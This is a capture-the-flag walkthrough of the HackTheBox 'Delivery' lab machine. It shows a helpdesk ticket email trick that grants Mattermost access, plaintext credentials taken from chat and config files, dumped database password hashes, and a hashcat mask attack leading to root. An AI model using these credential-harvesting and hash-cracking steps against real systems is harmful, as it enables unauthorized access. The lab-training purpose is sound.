Deliver
An easy Linux box from HackTheBox, use a cool ticket trick to get an email on the domain, then create an account on the messaging service with it to see private messages from root and plaintext ssh creds, then dump hashes from the database and crack them for root.
Recon
Running the usual nmap
georgy@pop-os:~/Documents/htb/delivery$ sudo nmap -sC -sV -Pn -oA nmap/init 10.10.10.222
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 9c40fa859b01acac0ebc0c19518aee27 (RSA)
| 256 5a0cc03b9b76552e6ec4f4b95d761709 (ECDSA)
|_ 256 b79df7489da2f27630fd42d3353a808c (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Welcome
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Pretty much just find a webserver, looking at it see a home page with not much on it
Snooping around for links, the “HelpDesk” link on the homepage goes to “helpdesk.deliver.htb” and the “Contact Us” page has a link to “delivery.htb:8065”
Add deliver.htb and helpdesk.delivery.htb to /etc/hosts
On the helpdesk side, find an SSRF in searchsploit when submitting tickets - was proven to be a rabbit hole
On port 8065 find a mattermost instance, one where we can create an account, but get blocked because we need to verify our email through clicking a link that is sent to it - obviously domains like @gmail dont work
Also should note that the “Contact Us” page specifies
Once you have an @delivery.htb email address, you'll be able to have access to our MatterMost server.
So we need a delivery.htb address
Lets submit a ticket with random info just to try it, and see that on submission we get a email address with the ticket number
In my case my email is 6227474@delivery.htb
Now maybe we can use this email to sign up, and see the verification link in the ticket details?
Exploitation
Sign up with 6227474@delivery.htb, with a password of Password1! - and go back to view our ticket
And see the verification link!
Using that, get access to the MatterMost instance, and immediately see creds to the mail user
maildeliverer:Youve_G0t_Mail!
As well as a hint for privesc, cracking hashes with variations of PleaseSubscribe!
Can now get a shell using ssh
georgy@pop-os:~/Documents/htb/delivery$ ssh maildeliverer@delivery.htb
maildeliverer@delivery.htb's password:
Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Oct 7 19:08:25 2022 from 10.10.14.13
maildeliverer@Delivery:~$ whoami
maildeliverer
Doing the usual enumeration, find a SQL server running on localhost
maildeliverer@Delivery:~$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
...
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN off (0.00/0/0)
...
There should be creds inside a config file for either the osticket or mattermost instance, and see from googling that osticket uses a backend MariaDB server but so does the mattermost server
Google around for where the SQL creds are, and see that they are in a file called “ost_config.php”, and search for it
maildeliverer@Delivery:/var$ find ./ -name *conf*.php 2>/dev/null
./www/osticket/upload/include/ost-sampleconfig.php
./www/osticket/upload/include/client/register.confirm.inc.php
./www/osticket/upload/include/client/register.confirmed.inc.php
./www/osticket/upload/include/class.config.php
./www/osticket/upload/include/staff/templates/confirm.tmpl.php
./www/osticket/upload/include/staff/templates/dynamic-field-config.tmpl.php
./www/osticket/upload/include/ost-config.php
./www/osticket/upload/include/ajax.config.php
Catting it out, find the creds in plaintext
# Mysql Login info
define('DBTYPE','mysql');
define('DBHOST','localhost');
define('DBNAME','osticket');
define('DBUSER','ost_user');
define('DBPASS','!H3lpD3sk123!');
Connecting and looking at the users, see that there is only maildeliverer
maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -P 8888 -u ost_user --database=osticket --password=\!H3lpD3sk123!
mysql> select * from ost_staff;
...
| 1 | 1 | 1 | maildeliverer | Delivery | Person | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy | NULL | maildeliverer@delivery.htb | | NULL | | | NULL | NULL
...
So move on to mattermost, find it in /opt/, and search it for config files
maildeliverer@Delivery:/opt$ find ./ -name *conf* 2>/dev/null
./mattermost/config
./mattermost/config/config.json
Cat out the json file and find the sql login creds
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s",
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
}
So dump the User table inside of the mattermost database
maildeliverer@Delivery:/opt$ mysql -h 127.0.0.1 -u mmuser --password=Crack_The_MM_Admin_PW
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 125
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> use mattermost;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [mattermost]> select * from Users;
...dumped...
And see the root user, and their hash
| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
root : $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO
Now like the message said, can use hashcat with the “PleaseSubscribe!” prefix, and crack just the end of the password
georgy@pop-os:~/Documents/htb/delivery$ hashcat -m 3200 hash.txt -a 3 -1?l?u?d PleaseSubscribe\!?1?1?1?1 --increment --increment-min 17
...
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
Cracked to be root:PleaseSubscribe!21
Now can su to root
maildeliverer@Delivery:/opt$ su root
Password:
root@Delivery:/opt# whoami
root
root@Delivery:/opt#